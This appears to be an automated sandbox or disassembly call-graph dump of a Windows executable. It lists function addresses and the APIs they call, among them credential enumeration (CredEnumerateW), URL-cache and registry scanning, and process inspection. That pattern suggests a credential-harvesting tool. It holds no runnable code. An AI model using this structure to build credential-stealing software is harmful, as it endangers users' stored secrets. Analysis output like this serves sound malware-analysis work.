38013->38014 38015 401130 38014->38015 38016 401134 GetModuleHandleW LoadIconW 38015->38016 38017 401107 wcsncat 38015->38017 38018 40a7be 38016->38018 38017->38015 38019 40a7d2 38018->38019 38019->37946 38019->38019 38020->37941 38024 409bfd memset wcscpy 38021->38024 38023 409cdb CreateFontIndirectW 38023->38013 38024->38023 38025->37955 38027 40aa14 38026->38027 38028 40aa0a free 38026->38028 38027->37961 38028->38027 38030 40a8eb 38029->38030 38031 40a8df wcslen 38029->38031 38032 40a906 free 38030->38032 38033 40a90f 38030->38033 38031->38030 38034 40a919 38032->38034 38035 4099f4 3 API calls 38033->38035 38036 40a932 38034->38036 38037 40a929 free 38034->38037 38035->38034 38038 4099f4 3 API calls 38036->38038 38039 40a93e memcpy 38037->38039 38040 40a93d 38038->38040 38039->37955 38040->38039 38042 409a41 38041->38042 38043 4099fb malloc 38041->38043 38042->37955 38045 409a37 38043->38045 38046 409a1c 38043->38046 38045->37955 38047 409a30 free 38046->38047 38048 409a20 memcpy 38046->38048 38047->38045 38048->38047 38050 40a9e7 38049->38050 38051 40a9dc free 38049->38051 38053 4099f4 3 API calls 38050->38053 38052 40a9f2 38051->38052 38052->37960 38053->38052 38078 409bca GetModuleFileNameW 38054->38078 38056 40dce6 wcsrchr 38057 40dcf5 38056->38057 38058 40dcf9 wcscat 38056->38058 38057->38058 38058->37967 38079 44db70 38059->38079 38063 40dbfd 38082 4447d9 38063->38082 38066 40dc34 wcscpy wcscpy 38108 40d6f5 38066->38108 38067 40dc1f wcscpy 38067->38066 38070 40d6f5 3 API calls 38071 40dc73 38070->38071 38072 40d6f5 3 API calls 38071->38072 38073 40dc89 38072->38073 38074 40d6f5 3 API calls 38073->38074 38075 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38074->38075 38114 40da80 38075->38114 38078->38056 38080 40dbb4 memset memset 38079->38080 38081 409bca GetModuleFileNameW 38080->38081 38081->38063 38084 4447f4 38082->38084 38083 40dc1b 38083->38066 38083->38067 38084->38083 38085 444807 ??2@YAPAXI 38084->38085 38086 44481f 38085->38086 38087 444873 _snwprintf 38086->38087 38088 4448ab wcscpy 38086->38088 38121 44474a 8 API calls 38087->38121 38090 4448bb 38088->38090 38122 44474a 8 API calls 38090->38122 38091 4448a7 38091->38088 38091->38090 38093 4448cd 38123 44474a 8 API calls 38093->38123 38095 4448e2 38124 44474a 8 API calls 38095->38124 38097 4448f7 38125 44474a 8 API calls 38097->38125 38099 44490c 38126 44474a 8 API calls 38099->38126 38101 444921 38127 44474a 8 API calls 38101->38127 38103 444936 38128 44474a 8 API calls 38103->38128 38105 44494b 38129 44474a 8 API calls 38105->38129 38107 444960 ??3@YAXPAX 38107->38083 38109 44db70 38108->38109 38110 40d702 memset GetPrivateProfileStringW 38109->38110 38111 40d752 38110->38111 38112 40d75c WritePrivateProfileStringW 38110->38112 38111->38112 38113 40d758 38111->38113 38112->38113 38113->38070 38115 44db70 38114->38115 38116 40da8d memset 38115->38116 38117 40daac LoadStringW 38116->38117 38118 40dac6 38117->38118 38118->38117 38120 40dade 38118->38120 38130 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38118->38130 38120->37896 38121->38091 38122->38093 38123->38095 38124->38097 38125->38099 38126->38101 38127->38103 38128->38105 38129->38107 38130->38118 38141 409b98 GetFileAttributesW 38131->38141 38133 40daea 38134 40db63 38133->38134 38135 40daef wcscpy wcscpy GetPrivateProfileIntW 38133->38135 38134->37897 38142 40d65d GetPrivateProfileStringW 38135->38142 38137 40db3e 38143 40d65d GetPrivateProfileStringW 38137->38143 38139 40db4f 38144 40d65d GetPrivateProfileStringW 38139->38144 38141->38133 38142->38137 38143->38139 38144->38134 38180 40eaff 38145->38180 38149 411ae2 memset 38148->38149 38150 411b8f 38148->38150 38221 409bca GetModuleFileNameW 38149->38221 38162 411a8b 38150->38162 38152 411b0a wcsrchr 38153 411b22 wcscat 38152->38153 38154 411b1f 38152->38154 38222 414770 wcscpy wcscpy wcscpy CloseHandle 38153->38222 38154->38153 38156 411b67 38223 402afb 38156->38223 38160 411b7f 38279 40ea13 SendMessageW memset SendMessageW 38160->38279 38163 402afb 27 API calls 38162->38163 38164 411ac0 38163->38164 38165 4110dc 38164->38165 38166 41113e 38165->38166 38171 4110f0 38165->38171 38304 40969c LoadCursorW SetCursor 38166->38304 38168 411143 38305 4032b4 38168->38305 38323 444a54 38168->38323 38169 4110f7 _wcsicmp 38169->38171 38170 411157 38172 40ada2 _wcsicmp 38170->38172 38171->38166 38171->38169 38326 410c46 10 API calls 38171->38326 38175 411167 38172->38175 38173 4111af 38175->38173 38176 4111a6 qsort 38175->38176 38176->38173 38179->37979 38181 40eb10 38180->38181 38194 40e8e0 38181->38194 38184 40eb6c memcpy memcpy 38185 40ebe1 38184->38185 38186 40ebb7 38184->38186 38185->38184 38187 40ebf2 ??2@YAPAXI ??2@YAPAXI 38185->38187 38186->38185 38188 40d134 16 API calls 38186->38188 38189 40ec2e ??2@YAPAXI 38187->38189 38192 40ec65 38187->38192 38188->38186 38189->38192 38204 40ea7f 38192->38204 38193 402f49 38193->37979 38195 40e8f2 38194->38195 38196 40e8eb ??3@YAXPAX 38194->38196 38197 40e900 38195->38197 38198 40e8f9 ??3@YAXPAX 38195->38198 38196->38195 38199 40e90a ??3@YAXPAX 38197->38199 38201 40e911 38197->38201 38198->38197 38199->38201 38200 40e931 ??2@YAPAXI ??2@YAPAXI 38200->38184 38201->38200 38202 40e921 ??3@YAXPAX 38201->38202 38203 40e92a ??3@YAXPAX 38201->38203 38202->38203 38203->38200 38205 40aa04 free 38204->38205 38206 40ea88 38205->38206 38207 40aa04 free 38206->38207 38208 40ea90 38207->38208 38209 40aa04 free 38208->38209 38210 40ea98 38209->38210 38211 40aa04 free 38210->38211 38212 40eaa0 38211->38212 38213 40a9ce 4 API calls 38212->38213 38214 40eab3 38213->38214 38215 40a9ce 4 API calls 38214->38215 38216 40eabd 38215->38216 38217 40a9ce 4 API calls 38216->38217 38218 40eac7 38217->38218 38219 40a9ce 4 API calls 38218->38219 38220 40ead1 38219->38220 38220->38193 38221->38152 38222->38156 38280 40b2cc 38223->38280 38225 402b0a 38226 40b2cc 27 API calls 38225->38226 38227 402b23 38226->38227 38228 40b2cc 27 API calls 38227->38228 38229 402b3a 38228->38229 38230 40b2cc 27 API calls 38229->38230 38231 402b54 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402b6b 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402b82 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402b99 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402bb0 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402bc7 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402bde 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402bf5 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402c0c 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402c23 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402c3a 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402c51 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402c68 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402c7f 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402c99 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402cb3 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402cd5 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402cf0 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402d0b 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402d26 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402d3e 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402d59 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402d78 38274->38275 38276 40b2cc 27 API calls 38275->38276 38277 402d93 38276->38277 38278 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38277->38278 38278->38160 38279->38150 38283 40b58d 38280->38283 38282 40b2d1 38282->38225 38284 40b5a4 GetModuleHandleW FindResourceW 38283->38284 38285 40b62e 38283->38285 38286 40b5c2 LoadResource 38284->38286 38288 40b5e7 38284->38288 38285->38282 38287 40b5d0 SizeofResource LockResource 38286->38287 38286->38288 38287->38288 38288->38285 38296 40afcf 38288->38296 38290 40b608 memcpy 38299 40b4d3 memcpy 38290->38299 38292 40b61e 38300 40b3c1 18 API calls 38292->38300 38294 40b626 38301 40b04b 38294->38301 38297 40b04b ??3@YAXPAX 38296->38297 38298 40afd7 ??2@YAPAXI 38297->38298 38298->38290 38299->38292 38300->38294 38302 40b051 ??3@YAXPAX 38301->38302 38303 40b05f 38301->38303 38302->38303 38303->38285 38304->38168 38306 4032c4 38305->38306 38307 40b633 free 38306->38307 38308 403316 38307->38308 38327 44553b 38308->38327 38312 403480 38525 40368c 15 API calls 38312->38525 38314 403489 38315 40b633 free 38314->38315 38316 403495 38315->38316 38316->38170 38317 4033a9 memset memcpy 38318 4033ec wcscmp 38317->38318 38319 40333c 38317->38319 38318->38319 38319->38312 38319->38317 38319->38318 38523 4028e7 11 API calls 38319->38523 38524 40f508 6 API calls 38319->38524 38322 403421 _wcsicmp 38322->38319 38324 444a64 FreeLibrary 38323->38324 38325 444a83 38323->38325 38324->38325 38325->38170 38326->38171 38328 445548 38327->38328 38329 445599 38328->38329 38526 40c768 38328->38526 38330 4455a8 memset 38329->38330 38338 4457f2 38329->38338 38609 403988 38330->38609 38336 4455e5 38351 445672 38336->38351 38356 44560f 38336->38356 38341 445854 38338->38341 38711 403e2d memset memset memset memset memset 38338->38711 38339 4458bb memset memset 38343 414c2e 14 API calls 38339->38343 38385 4458aa 38341->38385 38734 403c9c memset memset memset memset memset 38341->38734 38342 44595e memset memset 38346 414c2e 14 API calls 38342->38346 38347 4458f9 38343->38347 38345 445a00 memset memset 38757 414c2e 38345->38757 38354 44599c 38346->38354 38355 40b2cc 27 API calls 38347->38355 38348 44558c 38593 444b06 38348->38593 38349 44557a 38349->38348 38804 4136c0 CoTaskMemFree 38349->38804 38620 403fbe memset memset memset memset memset 38351->38620 38364 40b2cc 27 API calls 38354->38364 38365 445909 38355->38365 38367 4087b3 337 API calls 38356->38367 38358 445bca 38366 445c8b memset memset 38358->38366 38422 445cf0 38358->38422 38359 445b38 memset memset memset 38370 445bd4 38359->38370 38371 445b98 38359->38371 38360 445849 38820 40b1ab free free 38360->38820 38379 4459ac 38364->38379 38376 409d1f 6 API calls 38365->38376 38380 414c2e 14 API calls 38366->38380 38377 445621 38367->38377 38368 445585 38805 41366b FreeLibrary 38368->38805 38369 44589f 38821 40b1ab free free 38369->38821 38374 414c2e 14 API calls 38370->38374 38371->38370 38382 445ba2 38371->38382 38372 40b2cc 27 API calls 38384 445a4f 38372->38384 38387 445be2 38374->38387 38375 403335 38522 4452e5 45 API calls 38375->38522 38390 445919 38376->38390 38806 4454bf 20 API calls 38377->38806 38378 445823 38378->38360 38400 4087b3 337 API calls 38378->38400 38391 409d1f 6 API calls 38379->38391 38392 445cc9 38380->38392 38891 4099c6 wcslen 38382->38891 38383 4456b2 38808 40b1ab free free 38383->38808 38770 409d1f wcslen wcslen 38384->38770 38385->38339 38419 44594a 38385->38419 38398 40b2cc 27 API calls 38387->38398 38388 445d3d 38418 40b2cc 27 API calls 38388->38418 38389 445d88 memset memset memset 38401 414c2e 14 API calls 38389->38401 38822 409b98 GetFileAttributesW 38390->38822 38402 4459bc 38391->38402 38403 409d1f 6 API calls 38392->38403 38393 445879 38393->38369 38404 4087b3 337 API calls 38393->38404 38395 445bb3 38894 445403 memset 38395->38894 38396 445680 38396->38383 38643 4087b3 memset 38396->38643 38407 445bf3 38398->38407 38400->38378 38410 445dde 38401->38410 38887 409b98 GetFileAttributesW 38402->38887 38412 445ce1 38403->38412 38404->38393 38417 409d1f 6 API calls 38407->38417 38408 445928 38408->38419 38823 40b6ef 38408->38823 38420 40b2cc 27 API calls 38410->38420 38911 409b98 GetFileAttributesW 38412->38911 38416 40b2cc 27 API calls 38424 445a94 38416->38424 38426 445c07 38417->38426 38427 445d54 _wcsicmp 38418->38427 38419->38342 38431 4459ed 38419->38431 38430 445def 38420->38430 38421 4459cb 38421->38431 38438 40b6ef 249 API calls 38421->38438 38422->38375 38422->38388 38422->38389 38423 445389 255 API calls 38423->38358 38775 40ae18 38424->38775 38425 44566d 38425->38338 38694 413d4c 38425->38694 38434 445389 255 API calls 38426->38434 38435 445d71 38427->38435 38499 445d67 38427->38499 38429 445665 38807 40b1ab free free 38429->38807 38436 409d1f 6 API calls 38430->38436 38431->38345 38472 445b22 38431->38472 38440 445c17 38434->38440 38912 445093 23 API calls 38435->38912 38443 445e03 38436->38443 38438->38431 38439 4456d8 38445 40b2cc 27 API calls 38439->38445 38446 40b2cc 27 API calls 38440->38446 38442 44563c 38442->38429 38448 4087b3 337 API calls 38442->38448 38913 409b98 GetFileAttributesW 38443->38913 38444 40b6ef 249 API calls 38444->38375 38450 4456e2 38445->38450 38451 445c23 38446->38451 38447 445d83 38447->38375 38448->38442 38809 413fa6 _wcsicmp _wcsicmp 38450->38809 38455 409d1f 6 API calls 38451->38455 38453 445e12 38460 445e6b 38453->38460 38467 40b2cc 27 API calls 38453->38467 38458 445c37 38455->38458 38456 445aa1 38459 445b17 38456->38459 38476 445ab2 memset 38456->38476 38490 409d1f 6 API calls 38456->38490 38782 40add4 38456->38782 38787 445389 38456->38787 38796 40ae51 38456->38796 38457 4456eb 38463 4456fd memset memset memset memset 38457->38463 38464 4457ea 38457->38464 38465 445389 255 API calls 38458->38465 38888 40aebe 38459->38888 38915 445093 23 API calls 38460->38915 38810 409c70 wcscpy wcsrchr 38463->38810 38813 413d29 38464->38813 38471 445c47 38465->38471 38473 445e33 38467->38473 38469 445e7e 38475 445f67 38469->38475 38478 40b2cc 27 API calls 38471->38478 38472->38358 38472->38359 38474 409d1f 6 API calls 38473->38474 38479 445e47 38474->38479 38480 40b2cc 27 API calls 38475->38480 38481 40b2cc 27 API calls 38476->38481 38483 445c53 38478->38483 38914 409b98 GetFileAttributesW 38479->38914 38485 445f73 38480->38485 38481->38456 38482 409c70 2 API calls 38486 44577e 38482->38486 38487 409d1f 6 API calls 38483->38487 38489 409d1f 6 API calls 38485->38489 38491 409c70 2 API calls 38486->38491 38492 445c67 38487->38492 38488 445e56 38488->38460 38496 445e83 memset 38488->38496 38493 445f87 38489->38493 38490->38456 38494 44578d 38491->38494 38495 445389 255 API calls 38492->38495 38918 409b98 GetFileAttributesW 38493->38918 38494->38464 38501 40b2cc 27 API calls 38494->38501 38495->38358 38500 40b2cc 27 API calls 38496->38500 38499->38375 38499->38444 38502 445eab 38500->38502 38503 4457a8 38501->38503 38504 409d1f 6 API calls 38502->38504 38505 409d1f 6 API calls 38503->38505 38506 445ebf 38504->38506 38507 4457b8 38505->38507 38508 40ae18 9 API calls 38506->38508 38812 409b98 GetFileAttributesW 38507->38812 38518 445ef5 38508->38518 38510 4457c7 38510->38464 38511 4087b3 337 API calls 38510->38511 38511->38464 38512 40ae51 9 API calls 38512->38518 38513 445f5c 38514 40aebe FindClose 38513->38514 38514->38475 38515 40add4 2 API calls 38515->38518 38516 40b2cc 27 API calls 38516->38518 38517 409d1f 6 API calls 38517->38518 38518->38512 38518->38513 38518->38515 38518->38516 38518->38517 38520 445f3a 38518->38520 38916 409b98 GetFileAttributesW 38518->38916 38917 445093 23 API calls 38520->38917 38522->38319 38523->38322 38524->38319 38525->38314 38527 40c775 38526->38527 38919 40b1ab free free 38527->38919 38529 40c788 38920 40b1ab free free 38529->38920 38531 40c790 38921 40b1ab free free 38531->38921 38533 40c798 38534 40aa04 free 38533->38534 38535 40c7a0 38534->38535 38922 40c274 memset 38535->38922 38540 40a8ab 9 API calls 38541 40c7c3 38540->38541 38542 40a8ab 9 API calls 38541->38542 38543 40c7d0 38542->38543 38951 40c3c3 38543->38951 38547 40c7e5 38548 40c877 38547->38548 38549 40c86c 38547->38549 38974 40a706 wcslen memcpy 38547->38974 38976 40c634 49 API calls 38547->38976 38556 40bdb0 38548->38556 38977 4053fe 39 API calls 38549->38977 38552 40c813 _wcslwr 38975 40c634 49 API calls 38552->38975 38554 40c829 wcslen 38554->38547 39159 404363 38556->39159 38559 40bf5d 39179 40440c 38559->39179 38561 40bdee 38561->38559 38564 40b2cc 27 API calls 38561->38564 38562 40bddf CredEnumerateW 38562->38561 38565 40be02 wcslen 38564->38565 38565->38559 38572 40be1e 38565->38572 38566 40be26 wcsncmp 38566->38572 38569 40be7d memset 38570 40bea7 memcpy 38569->38570 38569->38572 38571 40bf11 wcschr 38570->38571 38570->38572 38571->38572 38572->38559 38572->38566 38572->38569 38572->38570 38572->38571 38573 40b2cc 27 API calls 38572->38573 38575 40bf43 LocalFree 38572->38575 39182 40bd5d 28 API calls 38572->39182 39183 404423 38572->39183 38574 40bef6 _wcsnicmp 38573->38574 38574->38571 38574->38572 38575->38572 38576 4135f7 39196 4135e0 38576->39196 38579 40b2cc 27 API calls 38580 41360d 38579->38580 38581 40a804 8 API calls 38580->38581 38582 413613 38581->38582 38583 41361b 38582->38583 38584 41363e 38582->38584 38586 40b273 27 API calls 38583->38586 38585 4135e0 FreeLibrary 38584->38585 38587 413643 38585->38587 38588 413625 GetProcAddress 38586->38588 38587->38349 38588->38584 38589 413648 38588->38589 38590 413658 38589->38590 38591 4135e0 FreeLibrary 38589->38591 38590->38349 38592 413666 38591->38592 38592->38349 39199 4449b9 38593->39199 38596 444c1f 38596->38329 38597 4449b9 42 API calls 38599 444b4b 38597->38599 38598 444c15 38600 4449b9 42 API calls 38598->38600 38599->38598 39220 444972 GetVersionExW 38599->39220 38600->38596 38602 444b99 memcmp 38607 444b8c 38602->38607 38603 444c0b 39224 444a85 42 API calls 38603->39224 38607->38602 38607->38603 39221 444aa5 42 API calls 38607->39221 39222 40a7a0 GetVersionExW 38607->39222 39223 444a85 42 API calls 38607->39223 38610 40399d 38609->38610 39225 403a16 38610->39225 38612 403a09 39239 40b1ab free free 38612->39239 38614 4039a3 38614->38612 38618 4039f4 38614->38618 39236 40a02c CreateFileW 38614->39236 38615 403a12 wcsrchr 38615->38336 38618->38612 38619 4099c6 2 API calls 38618->38619 38619->38612 38621 414c2e 14 API calls 38620->38621 38622 404048 38621->38622 38623 414c2e 14 API calls 38622->38623 38624 404056 38623->38624 38625 409d1f 6 API calls 38624->38625 38626 404073 38625->38626 38627 409d1f 6 API calls 38626->38627 38628 40408e 38627->38628 38629 409d1f 6 API calls 38628->38629 38630 4040a6 38629->38630 38631 403af5 20 API calls 38630->38631 38632 4040ba 38631->38632 38633 403af5 20 API calls 38632->38633 38634 4040cb 38633->38634 39266 40414f memset 38634->39266 38636 4040e0 38637 404140 38636->38637 38639 4040ec memset 38636->38639 38641 4099c6 2 API calls 38636->38641 38642 40a8ab 9 API calls 38636->38642 39280 40b1ab free free 38637->39280 38639->38636 38640 404148 38640->38396 38641->38636 38642->38636 39293 40a6e6 WideCharToMultiByte 38643->39293 38645 4087ed 39294 4095d9 memset 38645->39294 38648 408809 memset memset memset memset memset 38649 40b2cc 27 API calls 38648->38649 38650 4088a1 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 4088b1 38651->38652 38653 40b2cc 27 API calls 38652->38653 38654 4088c0 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 4088d0 38655->38656 38657 40b2cc 27 API calls 38656->38657 38658 4088df 38657->38658 38659 409d1f 6 API calls 38658->38659 38660 4088ef 38659->38660 38661 40b2cc 27 API calls 38660->38661 38662 4088fe 38661->38662 38663 409d1f 6 API calls 38662->38663 38664 40890e 38663->38664 38665 40b2cc 27 API calls 38664->38665 38666 40891d 38665->38666 38667 409d1f 6 API calls 38666->38667 38668 40892d 38667->38668 39313 409b98 GetFileAttributesW 38668->39313 38670 40893e 38671 408943 38670->38671 38672 408958 38670->38672 39314 407fdf 75 API calls 38671->39314 39315 409b98 GetFileAttributesW 38672->39315 38675 408964 38676 408969 38675->38676 38677 40897b 38675->38677 39316 4082c7 198 API calls 38676->39316 39317 409b98 GetFileAttributesW 38677->39317 38680 408987 38692 408953 38692->38396 38695 40b633 free 38694->38695 38696 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38695->38696 38697 413f00 Process32NextW 38696->38697 38698 413da5 OpenProcess 38697->38698 38699 413f17 CloseHandle 38697->38699 38700 413df3 memset 38698->38700 38703 413eb0 38698->38703 38699->38439 39583 413f27 38700->39583 38702 413ebf free 38702->38703 38703->38697 38703->38702 38704 4099f4 3 API calls 38703->38704 38704->38703 38705 413e37 GetModuleHandleW 38707 413e46 GetProcAddress 38705->38707 38708 413e1f 38705->38708 38707->38708 38708->38705 39588 413959 38708->39588 39604 413ca4 38708->39604 38710 413ea2 CloseHandle 38710->38703 38712 414c2e 14 API calls 38711->38712 38713 403eb7 38712->38713 38714 414c2e 14 API calls 38713->38714 38715 403ec5 38714->38715 38716 409d1f 6 API calls 38715->38716 38717 403ee2 38716->38717 38718 409d1f 6 API calls 38717->38718 38719 403efd 38718->38719 38720 409d1f 6 API calls 38719->38720 38721 403f15 38720->38721 38722 403af5 20 API calls 38721->38722 38723 403f29 38722->38723 38724 403af5 20 API calls 38723->38724 38725 403f3a 38724->38725 38726 40414f 33 API calls 38725->38726 38727 403f4f 38726->38727 38728 403faf 38727->38728 38730 403f5b memset 38727->38730 38732 4099c6 2 API calls 38727->38732 38733 40a8ab 9 API calls 38727->38733 39618 40b1ab free free 38728->39618 38730->38727 38731 403fb7 38731->38378 38732->38727 38733->38727 38735 414c2e 14 API calls 38734->38735 38736 403d26 38735->38736 38737 414c2e 14 API calls 38736->38737 38738 403d34 38737->38738 38739 409d1f 6 API calls 38738->38739 38740 403d51 38739->38740 38741 409d1f 6 API calls 38740->38741 38742 403d6c 38741->38742 38743 409d1f 6 API calls 38742->38743 38744 403d84 38743->38744 38745 403af5 20 API calls 38744->38745 38746 403d98 38745->38746 38747 403af5 20 API calls 38746->38747 38748 403da9 38747->38748 38749 40414f 33 API calls 38748->38749 38755 403dbe 38749->38755 38750 403e1e 39619 40b1ab free free 38750->39619 38751 403dca memset 38751->38755 38753 403e26 38753->38393 38754 4099c6 2 API calls 38754->38755 38755->38750 38755->38751 38755->38754 38756 40a8ab 9 API calls 38755->38756 38756->38755 38758 414b81 9 API calls 38757->38758 38759 414c40 38758->38759 38760 414c73 memset 38759->38760 39620 409cea 38759->39620 38764 414c94 38760->38764 38763 414c64 38763->38372 38765 414cf4 wcscpy 38764->38765 39623 414bb0 wcscpy 38764->39623 38765->38763 38767 414cd2 39624 4145ac RegQueryValueExW 38767->39624 38769 414ce9 38769->38765 38771 409d43 wcscpy 38770->38771 38773 409d62 38770->38773 38772 409719 2 API calls 38771->38772 38774 409d51 wcscat 38772->38774 38773->38416 38774->38773 38776 40aebe FindClose 38775->38776 38777 40ae21 38776->38777 38778 4099c6 2 API calls 38777->38778 38779 40ae35 38778->38779 38780 409d1f 6 API calls 38779->38780 38781 40ae49 38780->38781 38781->38456 38783 40ade0 38782->38783 38784 40ae0f 38782->38784 38783->38784 38785 40ade7 wcscmp 38783->38785 38784->38456 38785->38784 38786 40adfe wcscmp 38785->38786 38786->38784 38788 40ae18 9 API calls 38787->38788 38790 4453c4 38788->38790 38789 40ae51 9 API calls 38789->38790 38790->38789 38791 4453f3 38790->38791 38792 40add4 2 API calls 38790->38792 38795 445403 250 API calls 38790->38795 38793 40aebe FindClose 38791->38793 38792->38790 38794 4453fe 38793->38794 38794->38456 38795->38790 38797 40ae7b FindNextFileW 38796->38797 38798 40ae5c FindFirstFileW 38796->38798 38799 40ae94 38797->38799 38800 40ae8f 38797->38800 38798->38799 38802 40aeb6 38799->38802 38803 409d1f 6 API calls 38799->38803 38801 40aebe FindClose 38800->38801 38801->38799 38802->38456 38803->38802 38804->38368 38805->38348 38806->38442 38807->38425 38808->38425 38809->38457 38811 409c89 38810->38811 38811->38482 38812->38510 38814 413d39 38813->38814 38815 413d2f FreeLibrary 38813->38815 38816 40b633 free 38814->38816 38815->38814 38817 413d42 38816->38817 38818 40b633 free 38817->38818 38819 413d4a 38818->38819 38819->38338 38820->38341 38821->38385 38822->38408 38824 44db70 38823->38824 38825 40b6fc memset 38824->38825 38826 409c70 2 API calls 38825->38826 38827 40b732 wcsrchr 38826->38827 38828 40b743 38827->38828 38829 40b746 memset 38827->38829 38828->38829 38830 40b2cc 27 API calls 38829->38830 38831 40b76f 38830->38831 38832 409d1f 6 API calls 38831->38832 38833 40b783 38832->38833 39625 409b98 GetFileAttributesW 38833->39625 38835 40b792 38836 40b7c2 38835->38836 38838 409c70 2 API calls 38835->38838 39626 40bb98 38836->39626 38840 40b7a5 38838->38840 38843 40b2cc 27 API calls 38840->38843 38841 40b837 CloseHandle 38846 40b83e memset 38841->38846 38842 40b817 39660 409a45 GetTempPathW 38842->39660 38844 40b7b2 38843->38844 38847 409d1f 6 API calls 38844->38847 39659 40a6e6 WideCharToMultiByte 38846->39659 38847->38836 38848 40b827 38848->38846 38850 40b866 38851 444432 120 API calls 38850->38851 38852 40b879 38851->38852 38853 40b273 27 API calls 38852->38853 38854 40bad5 38852->38854 38855 40b89a 38853->38855 38856 40b04b ??3@YAXPAX 38854->38856 38857 438552 133 API calls 38855->38857 38858 40baf3 38856->38858 38859 40b8a4 38857->38859 38858->38419 38860 40bacd 38859->38860 38862 4251c4 136 API calls 38859->38862 38861 443d90 110 API calls 38860->38861 38861->38854 38885 40b8b8 38862->38885 38863 40bac6 39672 424f26 122 API calls 38863->39672 38864 40b8bd memset 39663 425413 17 API calls 38864->39663 38867 425413 17 API calls 38867->38885 38870 40a71b MultiByteToWideChar 38870->38885 38871 40a734 MultiByteToWideChar 38871->38885 38874 40b9b5 memcmp 38874->38885 38875 4099c6 2 API calls 38875->38885 38876 404423 37 API calls 38876->38885 38879 4251c4 136 API calls 38879->38885 38880 40bb3e memset memcpy 39673 40a734 MultiByteToWideChar 38880->39673 38882 40bb88 LocalFree 38882->38885 38885->38863 38885->38864 38885->38867 38885->38870 38885->38871 38885->38874 38885->38875 38885->38876 38885->38879 38885->38880 38886 40ba5f memcmp 38885->38886 39664 4253ef 16 API calls 38885->39664 39665 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38885->39665 39666 4253af 17 API calls 38885->39666 39667 4253cf 17 API calls 38885->39667 39668 447280 memset 38885->39668 39669 447960 memset memcpy memcpy memcpy 38885->39669 39670 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38885->39670 39671 447920 memcpy memcpy memcpy 38885->39671 38886->38885 38887->38421 38889 40aed1 38888->38889 38890 40aec7 FindClose 38888->38890 38889->38472 38890->38889 38892 4099d7 38891->38892 38893 4099da memcpy 38891->38893 38892->38893 38893->38395 38895 40b2cc 27 API calls 38894->38895 38896 44543f 38895->38896 38897 409d1f 6 API calls 38896->38897 38898 44544f 38897->38898 39765 409b98 GetFileAttributesW 38898->39765 38900 44545e 38901 445476 38900->38901 38903 40b6ef 249 API calls 38900->38903 38902 40b2cc 27 API calls 38901->38902 38904 445482 38902->38904 38903->38901 38905 409d1f 6 API calls 38904->38905 38906 445492 38905->38906 39766 409b98 GetFileAttributesW 38906->39766 38908 4454a1 38909 4454b9 38908->38909 38910 40b6ef 249 API calls 38908->38910 38909->38423 38910->38909 38911->38422 38912->38447 38913->38453 38914->38488 38915->38469 38916->38518 38917->38518 38918->38499 38919->38529 38920->38531 38921->38533 38923 414c2e 14 API calls 38922->38923 38924 40c2ae 38923->38924 38978 40c1d3 38924->38978 38929 40c3be 38946 40a8ab 38929->38946 38930 40afcf 2 API calls 38931 40c2fd FindFirstUrlCacheEntryW 38930->38931 38932 40c3b6 38931->38932 38933 40c31e wcschr 38931->38933 38934 40b04b ??3@YAXPAX 38932->38934 38935 40c331 38933->38935 38936 40c35e FindNextUrlCacheEntryW 38933->38936 38934->38929 38938 40a8ab 9 API calls 38935->38938 38936->38933 38937 40c373 GetLastError 38936->38937 38939 40c3ad FindCloseUrlCache 38937->38939 38940 40c37e 38937->38940 38941 40c33e wcschr 38938->38941 38939->38932 38942 40afcf 2 API calls 38940->38942 38941->38936 38943 40c34f 38941->38943 38944 40c391 FindNextUrlCacheEntryW 38942->38944 38945 40a8ab 9 API calls 38943->38945 38944->38933 38944->38939 38945->38936 39094 40a97a 38946->39094 38949 40a8cc 38949->38540 38950 40a8d0 7 API calls 38950->38949 39099 40b1ab free free 38951->39099 38953 40c3dd 38954 40b2cc 27 API calls 38953->38954 38955 40c3e7 38954->38955 38956 40c50e 38955->38956 38957 40c3ff 38955->38957 38971 405337 38956->38971 38958 40a9ce 4 API calls 38957->38958 38959 40c418 memset 38958->38959 39100 40aa1d 38959->39100 38962 40c471 38964 40c47a _wcsupr 38962->38964 38963 40c505 38963->38956 38965 40a8d0 7 API calls 38964->38965 38966 40c498 38965->38966 38967 40a8d0 7 API calls 38966->38967 38968 40c4ac memset 38967->38968 38969 40aa1d 38968->38969 38970 40c4e4 RegEnumValueW 38969->38970 38970->38963 38970->38964 39102 405220 38971->39102 38974->38552 38975->38554 38976->38547 38977->38548 38979 40ae18 9 API calls 38978->38979 38985 40c210 38979->38985 38980 40ae51 9 API calls 38980->38985 38981 40c264 38982 40aebe FindClose 38981->38982 38984 40c26f 38982->38984 38983 40add4 2 API calls 38983->38985 38990 40e5ed memset memset 38984->38990 38985->38980 38985->38981 38985->38983 38986 40c231 _wcsicmp 38985->38986 38987 40c1d3 34 API calls 38985->38987 38986->38985 38988 40c248 38986->38988 38987->38985 39003 40c084 21 API calls 38988->39003 